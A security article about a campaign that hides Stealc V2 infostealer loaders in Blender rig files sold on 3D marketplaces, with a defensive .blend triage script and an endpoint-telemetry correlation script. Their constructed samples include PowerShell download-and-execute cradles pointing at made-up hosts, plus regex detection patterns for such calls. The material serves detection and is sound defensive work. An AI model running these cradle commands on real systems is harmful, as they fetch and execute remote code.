A Russian-speaking threat actor is quietly weaponizing 3D model marketplaces, planting malicious Blender project files that deliver the 𝗦𝘁𝗲𝗮𝗹𝗰 𝗩𝟮 information-stealing malware to artists, freelancers, and studios. The operation relies on realistic-looking character rigs published on platforms such as CGTrader, then abuses Blender’s ability to run embedded Python scripts to pivot from a creative workflow into a full credential-theft compromise. Because many of those targets work inside studio pipelines, render farms, or asset repositories, this delivery vector gives attackers immediate access to environments that typically hold high-value accounts, source files, and in many cases payment details. That shift turns a seemingly niche 3D content problem into a mainstream enterprise security issue.
𝗕𝗹𝗲𝗻𝗱𝗲𝗿 𝗮𝘀 𝗮 𝗺𝗮𝗹𝘄𝗮𝗿𝗲 𝗱𝗲𝗹𝗶𝘃𝗲𝗿𝘆 𝗰𝗵𝗮𝗻𝗻𝗲𝗹
Blender supports rich automation through Python. Riggers and technical artists routinely embed scripts in .blend files to build custom user interfaces, automate rig controls, or drive complex animation systems. When the 𝗔𝘂𝘁𝗼 𝗥𝘂𝗻 𝗣𝘆𝘁𝗵𝗼𝗻 𝗦𝗰𝗿𝗶𝗽𝘁𝘀 preference is enabled, those scripts (text datablocks marked to register on load, and the Python expressions inside drivers) execute automatically as soon as the project file is opened, inside Blender’s own process and without any further user interaction.
In a normal pipeline, that convenience saves time and allows advanced rigs to “just work” out of the box. In this campaign, the same feature becomes the initial execution vector. The adversary uploads character rigs that appear attractive and technically polished. As soon as a target opens the downloaded file with Auto Run enabled, the embedded Python code runs in the background and silently starts the infection chain.
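A practitioner’s first question about a marketplace download is whether it carries embedded scripts at all, and that can be answered without opening it in Blender. The following stand-alone script is an added example written for this article; it is not code from Blender or from the researchers who analysed the campaign. It walks the .blend container’s block headers, lists every Text datablock, reconstructs the text lines and greps them for risky calls. It assumes the classic container layout (12-byte header, fixed-size block headers) used through the Blender 4.x series, handles gzip-compressed saves but not zstd ones, and recovers the datablock name and script text heuristically rather than by decoding SDNA. The sample file it scans is constructed inline; the datablock name, command and URL in it are made up.

```python
"""Static triage of a downloaded .blend: list embedded Text datablocks and the risky
calls they reference, without ever opening the file in Blender.

Assumes the classic .blend container (Blender 2.x-4.x): a 12-byte header ("BLENDER",
pointer-size char, endianness char, 3-char version) followed by file blocks whose
header is code[4], size[int32], old-address[ptr], sdna-index[int32], count[int32].
Datablock names and script text are recovered heuristically (no SDNA decoding).
"""
import gzip
import re
import struct
from collections import Counter

GZIP_MAGIC, ZSTD_MAGIC = b"\x1f\x8b", b"\x28\xb5\x2f\xfd"

# Label -> regex over the recovered script bytes. Heuristic triage, not a verdict.
SUSPICIOUS = {
    "process_spawn": rb"subprocess|os\.system|os\.popen|powershell|cmd\.exe",
    "network": rb"https?://|urllib|requests\.|socket\.|\biwr\b|invoke-webrequest|workers\.dev",
    "obfuscation": rb"base64|\bexec\s*\(|\beval\s*\(|\bcompile\s*\(",
    "autorun_hook": rb"bpy\.app\.handlers|load_post|\bregister\s*\(",
    "persistence": rb"winreg|\\Startup\\|\.lnk\b|schtasks",
}

def decompress(data):
    if data.startswith(GZIP_MAGIC):            # pre-3.0 compressed saves
        return gzip.decompress(data)
    if data.startswith(ZSTD_MAGIC):            # 3.0+ compressed saves
        raise ValueError("zstd-compressed .blend: run 'zstd -d' first, this script is stdlib-only")
    return data

def iter_blocks(data):
    """Yield (code, payload) for every file block, stopping at ENDB."""
    if data[:7] != b"BLENDER":
        raise ValueError("not an uncompressed .blend header")
    ptr = "Q" if data[7:8] == b"-" else "I"     # '-' = 8-byte pointers, '_' = 4-byte
    end = "<" if data[8:9] == b"v" else ">"     # 'v' = little-endian, 'V' = big-endian
    head = struct.Struct(f"{end}4si{ptr}ii")
    off = 12
    while off + head.size <= len(data):
        code, size, _old, _sdna, _count = head.unpack_from(data, off)
        off += head.size
        code = code.rstrip(b"\0")
        if not re.fullmatch(rb"[A-Za-z0-9]{2,4}", code):
            raise ValueError(f"unexpected block code {code!r}: unsupported layout?")
        yield code, data[off:off + size]
        if code == b"ENDB":
            return
        off += size

def triage(data):
    data = decompress(data)
    report = {"version": data[9:12].decode("ascii", "replace"), "block_codes": Counter(), "texts": []}
    current = None
    for code, payload in iter_blocks(data):
        report["block_codes"][code] += 1
        if code == b"TX":                       # Text datablock; its ID name field reads "TX<name>"
            m = re.search(rb"TX[\x20-\x7e]{1,64}", payload)
            current = {"name": m.group(0)[2:].decode() if m else "?", "raw": b""}
            report["texts"].append(current)
        elif code == b"DATA" and current is not None:
            current["raw"] += payload           # TextLine structs plus NUL-terminated line strings
        else:
            current = None                      # any other block ends this text's data run
    for t in report["texts"]:
        raw = t.pop("raw")
        t["lines"] = [s.decode() for s in raw.split(b"\0")
                      if s and all(b == 9 or 32 <= b < 127 for b in s)]
        t["flags"] = sorted(k for k, pat in SUSPICIOUS.items() if re.search(pat, raw, re.I))
    return report

def _block(code, payload):
    return struct.pack("<4siQii", code.ljust(4, b"\0"), len(payload), 0, 0, 1) + payload

def make_sample_blend(compress=False):
    """Constructed stand-in for a marketplace download: correct framing, one embedded
    Text datablock, filler in place of real DNA. Not produced by Blender; contents invented."""
    script = (b"import bpy, subprocess\n"
              b"subprocess.Popen(['powershell', '-w', 'hidden', '-c', 'iwr https://example.invalid/x'])\n")
    id_struct = b"\0" * 40 + b"TXstartup.py".ljust(66, b"\0")
    raw = (b"BLENDER-v402" + _block(b"REND", b"\0" * 16) + _block(b"TX", id_struct)
           + b"".join(_block(b"DATA", ln + b"\0") for ln in script.splitlines())
           + _block(b"DNA1", b"SDNA") + _block(b"ENDB", b""))
    return gzip.compress(raw) if compress else raw

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_sample_blend()
    rep = triage(data)
    print("blender", rep["version"], dict(rep["block_codes"]))
    for t in rep["texts"]:
        print(f"text {t['name']!r} flags={t['flags']}")
        for ln in t["lines"]:
            print("   ", ln)
```

Run it as python blend_triage.py download.blend; with no argument it scans the constructed sample. A hit is a reason to open the file only in a disposable VM with automatic script execution disabled, so the embedded text stays inert while you read it. The script does not tell you whether a text is flagged to register on load, only that it exists and what it references, and the line reconstruction can include short fragments of struct bytes that happen to be printable.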
𝗙𝗿𝗼𝗺 𝘁𝗿𝘂𝘀𝘁𝗲𝗱 𝗺𝗼𝗱𝗲𝗹 𝗳𝗶𝗹𝗲 𝘁𝗼 𝗮 𝗦𝘁𝗲𝗮𝗹𝗰 𝗽𝗮𝘆𝗹𝗼𝗮𝗱
The malicious Blender files embed Python that contacts attacker-controlled infrastructure hosted behind Cloudflare Workers. From there, the script downloads a loader component that orchestrates the next stages.
That loader retrieves two archives, named 𝗭𝗮𝗹𝘆𝗽𝗮𝗚𝘆𝗹𝗶𝘃𝗲𝗿𝗮𝗩𝟭 and 𝗕𝗟𝗘𝗡𝗗𝗘𝗥𝗫, from IP addresses controlled by the threat actor. After extracting them into the Windows temporary directory, the malware creates shortcut files in the Startup folder, which gives the attackers persistence across reboots without the noise of a new service or scheduled task. The same stage drops two data-theft components: the main 𝗦𝘁𝗲𝗮𝗹𝗰 𝗶𝗻𝗳𝗼𝘀𝘁𝗲𝗮𝗹𝗲𝗿 and an auxiliary Python-based stealer that likely serves as a fallback if the primary payload fails or is blocked.
By the time the victim starts exploring the rig or moving the 3D model into a project, the system has already reached a post-compromise state. No exploit kit, no phishing page, just a “legitimate” asset file that behaves like an application.
𝗪𝗵𝘆 𝘁𝗵𝗶𝘀 𝗰𝗮𝗺𝗽𝗮𝗶𝗴𝗻 𝗱𝗿𝗼𝗽𝘀 𝗦𝘁𝗲𝗮𝗹𝗰 𝗩𝟮
Stealc emerged as a MaaS (Malware-as-a-Service) infostealer around 2023, positioned as a competitor and copycat of families such as Vidar, Raccoon, Mars, and RedLine. It gained traction quickly in Russian-language cybercrime forums due to its modular design, active development roadmap, and focus on credential and wallet theft.
The variant used in the Blender campaign tracks with the second major version of Stealc. Public reporting indicates that this branch extends support to more than twenty mainstream browsers, a long list of browser extensions, and numerous desktop applications. In this operation, the malware focuses on:
– Harvesting credentials and session cookies from Chromium-based and Gecko-based browsers, with server-side decryption for newer Chrome builds.
– Targeting a broad catalog of cryptocurrency browser extensions and standalone wallet applications in an effort to drain funds or resell seed phrases.
– Extracting tokens and chat data from messaging platforms such as Telegram and Discord, along with other communication tools frequently used in gaming and creative communities.
– Pulling configuration data from VPN clients and email programs like Thunderbird to support later lateral movement or business email compromise.
The Stealc family also continues to evolve its evasion layer. Analysts watching this campaign note that the sample tied to the Blender delivery path initially went undetected by security engines on multi-scanner platforms, which aligns with Stealc’s reputation for fast iteration and packing changes.
𝗣𝗿𝗮𝗰𝘁𝗶𝗰𝗮𝗹 𝗧𝗥𝗜 𝗮𝗻𝗱 𝗵𝘂𝗻𝘁𝗶𝗻𝗴 𝗰𝗼𝗻𝘀𝗶𝗱𝗲𝗿𝗮𝘁𝗶𝗼𝗻𝘀
From a detection and response standpoint, the interesting part of this campaign is the blend of benign-looking activity and a very conventional infostealer objective. Most SOCs do not have rules tuned for “suspicious Blender project behavior,” yet the observable telemetry still exposes several footholds for defenders who know where to look.
On endpoints that run Blender, security teams should pay attention to:
– Blender spawning child processes such as powershell.exe, cmd.exe or a standalone python.exe shortly after a file is opened. Blender’s bundled Python runs inside blender.exe, so a child interpreter is unusual in itself, and doubly so when it is followed by network connections to previously unseen domains or IP ranges.
– PowerShell invoking download-and-execute patterns, including one-liners that use standard web cmdlets to retrieve remote scripts.
– Archive extraction into the system temporary directory followed by the creation of shortcut files in Startup, particularly when the archive names do not match any known tooling in the environment.
– New binaries or scripts that start shortly after Blender file opens, then persist independently of the main application.
Stealc-specific hunting then layers on top of that Blender-centric telemetry. Defenders should correlate web credential access from processes outside normal browser parents, large exfiltration bursts toward unfamiliar infrastructure, and rapid enumeration of wallet, browser, and VPN directories shortly after a suspect file opens. Threat intel from recent Stealc campaigns can provide C2 patterns and YARA rules suitable for deeper sweeps.
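To make the list above concrete, here is an added example, not from the article, of that correlation logic run over constructed Sysmon-style events: one artist workstation that follows the chain described (Blender opens a download, spawns a hidden PowerShell carrying a download cradle, drops an archive in Temp and a .lnk in Startup) and one render node whose Blender and Python activity is legitimate. Every host name, path, command line and destination address is invented for the example.

```python
"""Correlating Blender-centric endpoint telemetry against the observed chain.

Constructed sample events in a Sysmon-like shape: process creation (parent, image,
command line), network connection and file creation. All hosts, users, paths and the
destination address are made up; none is an indicator from the campaign.
"""
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

BLENDER = r"C:\Program Files\Blender Foundation\Blender 4.2\blender.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # Artist workstation: Blender opens a marketplace download, then the chain begins.
    {"t": "2025-11-20T10:00:00", "host": "ws-art-07", "type": "process", "image": BLENDER,
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Blender Foundation\Blender 4.2\blender.exe" "C:\Users\art\Downloads\hero_rig_v3.blend"'},
    {"t": "2025-11-20T10:00:04", "host": "ws-art-07", "type": "process", "image": PS, "parent": BLENDER,
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/l')\""},
    {"t": "2025-11-20T10:00:05", "host": "ws-art-07", "type": "network", "image": PS, "dest": "203.0.113.10:443"},
    {"t": "2025-11-20T10:00:08", "host": "ws-art-07", "type": "file", "image": PS,
     "path": r"C:\Users\art\AppData\Local\Temp\assets.zip"},
    {"t": "2025-11-20T10:00:09", "host": "ws-art-07", "type": "file", "image": PS,
     "path": r"C:\Users\art\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk"},
    # Render node: Blender plus a Python publish step, both launched by the farm agent, not by Blender.
    {"t": "2025-11-20T10:02:00", "host": "render-02", "type": "process", "image": BLENDER,
     "parent": r"C:\farm\agent.exe", "cmdline": r"blender.exe -b C:\jobs\shot010.blend -a"},
    {"t": "2025-11-20T10:02:30", "host": "render-02", "type": "process",
     "image": r"C:\Python311\python.exe", "parent": r"C:\farm\agent.exe", "cmdline": "python.exe publish.py"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "python.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CRADLE_RE = re.compile(r"invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|\bcurl\b", re.I)
ARCHIVE_RE = re.compile(r"expand-archive|\btar(\.exe)?\b.*\s-x|7z(\.exe)?\s+x\b", re.I)
STARTUP = "\\start menu\\programs\\startup\\"

def _base(path):
    return PureWindowsPath(path).name.lower()

def classify(ev):
    """Return the set of signal names a single event matches."""
    hits = set()
    if ev["type"] == "process":
        cmd = ev.get("cmdline", "")
        # Blender's bundled Python runs inside blender.exe, so any child interpreter is suspicious by itself.
        if _base(ev["parent"]) == "blender.exe" and _base(ev["image"]) in INTERPRETERS:
            hits.add("blender_child_interpreter")
        if CRADLE_RE.search(cmd):
            hits.add("download_cradle")
        if ARCHIVE_RE.search(cmd) and "\\temp\\" in cmd.lower():
            hits.add("archive_to_temp")
    elif ev["type"] == "file":
        p = ev["path"].lower()
        if STARTUP in p and p.endswith(".lnk"):
            hits.add("startup_lnk")
        if "\\appdata\\local\\temp\\" in p and p.rsplit(".", 1)[-1] in {"zip", "rar", "7z"}:
            hits.add("archive_to_temp")
    elif ev["type"] == "network" and _base(ev["image"]) in INTERPRETERS | {"blender.exe"}:
        hits.add("interpreter_outbound")
    return hits

def correlate(events, window=timedelta(minutes=10), min_signals=2):
    """One alert per blender.exe start that is followed, on the same host and inside the
    window, by a child interpreter plus at least one other signal."""
    events = sorted(events, key=lambda e: e["t"])
    alerts = []
    for ev in events:
        if ev["type"] != "process" or _base(ev["image"]) != "blender.exe":
            continue
        t0 = datetime.fromisoformat(ev["t"])
        signals, evidence = set(), []
        for later in events:
            if later["host"] != ev["host"]:
                continue
            dt = datetime.fromisoformat(later["t"]) - t0
            if timedelta(0) <= dt <= window:
                hits = classify(later)
                if hits:
                    signals |= hits
                    evidence.append(later["t"])
        if "blender_child_interpreter" in signals and len(signals) >= min_signals:
            alerts.append({"host": ev["host"], "trigger": ev["cmdline"],
                           "signals": sorted(signals), "events": evidence})
    return alerts

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a["host"], a["signals"], a["events"])
```

The alert keys on blender.exe as the parent of an interpreter plus at least one further signal within ten minutes, so a render farm that runs Blender and Python side by side under a scheduler does not fire. Tune INTERPRETERS and the window to your fleet, and expect the download-cradle regex to need exclusions wherever administrators legitimately use Invoke-WebRequest.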
𝗦𝘂𝗽𝗽𝗹𝘆-𝗰𝗵𝗮𝗶𝗻 𝗿𝗶𝘀𝗸𝘀 𝗶𝗻 𝟯𝗗 𝗺𝗼𝗱𝗲𝗹 𝗺𝗮𝗿𝗸𝗲𝘁𝗽𝗹𝗮𝗰𝗲𝘀
Public 3D marketplaces such as CGTrader and similar platforms function as supply-chain hubs in many studios and freelance pipelines. Artists often download rigs, props, and environments on tight deadlines and import them directly into client workspaces. Although those platforms enforce terms of service and provide general security guidance, they cannot feasibly analyze, statically or dynamically, every embedded script inside user-uploaded .blend files.
That reality creates a gap where adversaries can blend malicious files into a vast sea of legitimate content. In this Stealc campaign, the attackers leaned into that trust, publishing rigs that look useful and professional enough to attract both hobbyists and professionals. Once those assets spread organically through bookmarks, project folders, and shared drives, the malicious payload travels with them.
For security engineers, it helps to treat these marketplaces the same way you already treat public code repositories or open-source packages: as untrusted sources until proven otherwise.
𝗕𝗲𝘀𝘁 𝗽𝗿𝗮𝗰𝘁𝗶𝗰𝗲𝘀 𝗳𝗼𝗿 𝗕𝗹𝗲𝗻𝗱𝗲𝗿 𝘂𝘀𝗲𝗿𝘀 𝗮𝗻𝗱 𝘀𝘁𝘂𝗱𝗶𝗼𝘀
For individual artists and for studios with established pipelines, several practical steps reduce the blast radius of this class of attack without blocking Blender outright.
First, Blender’s own documentation emphasizes caution around 𝗔𝘂𝘁𝗼 𝗥𝘂𝗻 𝗣𝘆𝘁𝗵𝗼𝗻 𝗦𝗰𝗿𝗶𝗽𝘁𝘀, and Blender ships with the option off. Keep it off. When a file created in-house or received through a vetted internal channel genuinely needs its scripts, use the per-file prompt Blender shows on load (Allow Execution) rather than flipping the global preference, and for review sessions launch Blender with -Y (--disable-autoexec), which forces script execution off for that run regardless of the saved preference. Treat marketplace downloads as untrusted until they pass review.
Second, organizations can isolate risky workflows. Many studios already segment render nodes and file servers; the same logic applies here. Running marketplace-sourced files inside dedicated virtual machines or sandboxed hosts reduces direct exposure of production passwords, SSO sessions, and payment credentials. That isolation also yields clean telemetry because background activity on those hosts tends to be more predictable.
Third, security teams can build simple internal guidelines for 3D asset hygiene: who can download external rigs, which directories belong on Blender’s Excluded Paths list (where scripts never auto-run even if the preference is on), and when it is acceptable to enable script execution permanently. Combining those policies with lightweight monitoring around Blender hosts gives defenders more signal and less guesswork.
𝗪𝗵𝗮𝘁 𝘁𝗵𝗶𝘀 𝗺𝗲𝗮𝗻𝘀 𝗳𝗼𝗿 𝗯𝗿𝗼𝗮𝗱𝗲𝗿 𝗶𝗻𝗳𝗼𝘀𝘁𝗲𝗮𝗹𝗲𝗿 𝘁𝗿𝗲𝗻𝗱𝘀
Stealc slots neatly into a much broader rise in infostealer operations. Recent industry reporting estimates that infostealers now drive enormous volumes of credential theft and contribute heavily to follow-on ransomware, account takeover, and cloud breaches. The Blender campaign does not introduce a brand-new malware family; instead, it illustrates how mature infostealers ride novel initial access paths into new communities.
For defenders, that pattern reinforces a familiar message. It is no longer enough to watch email gateways and office documents. Security programs that touch creative industries, gaming, or design should assume that 3D assets, texture packs, and plugin bundles can carry the same level of risk as browser extensions or cracked software.
Title: “How Malicious Blender Files Deliver Stealc Malware to 3D Artists”